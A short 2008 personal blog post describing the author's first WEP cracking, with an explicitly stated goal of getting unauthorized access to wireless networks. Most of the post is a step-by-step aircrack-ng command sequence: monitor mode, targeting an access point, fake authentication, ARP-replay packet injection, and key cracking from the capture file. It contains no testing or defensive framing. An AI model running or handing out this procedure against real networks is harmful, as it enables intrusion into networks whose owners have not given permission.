Thursday, May 8, 2008

My first experience in WEP hacking

Is been years I thinking and wonder how to hack AP to get unauthorized access into wireless network.

I finally done it. Thanks to my friend provide me supported hardware (WG2000 with chipset zd1211) and a friend with kernel hacker expert :)


Here is the operating system environment:

FedoraCore 6 (kernel version 2.6.23.17)

- ieee80211.patch

- zd12111_firmware1.4

- zd1211rw.patch



Hacking WEP steps:

0. Enable Wireless adaptor with monitor mode
-> airmon-ng start [adaptor_interface]
-> airmon-ng start wlan0



1. View surounding APs
-> airodump-ng
-> airodump-ng wlan0



2. Target single AP and Channel, then start capturing the packet info
-> airodump-ng -c [channel] --bssid [ap_mac] -w [outfilename] [adaptor_interface]

3. Do fake authentication
-> aireplay-ng -1 0 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]

4. Keep fake authenication alive
-> aireplay-ng -1 6000 -o 1 -q 10 -e [ap_name] -a [ap_mac] -h [adaptor_mac][adaptor_interface]

5. Make packet injection with arp attack
-> aireplay-ng -3 -b [ap_mac] -h [adaptor_mac] [adaptor_interface]

6. Crack the AP KEY with .cap
-> aircrack-ng -z -b [ap_mac] [outfilename].cap
-> aircrack-ng -b [ap_mac] [outfilename].cap

Steps 5 and 6 can be executed parallel :D

No comments: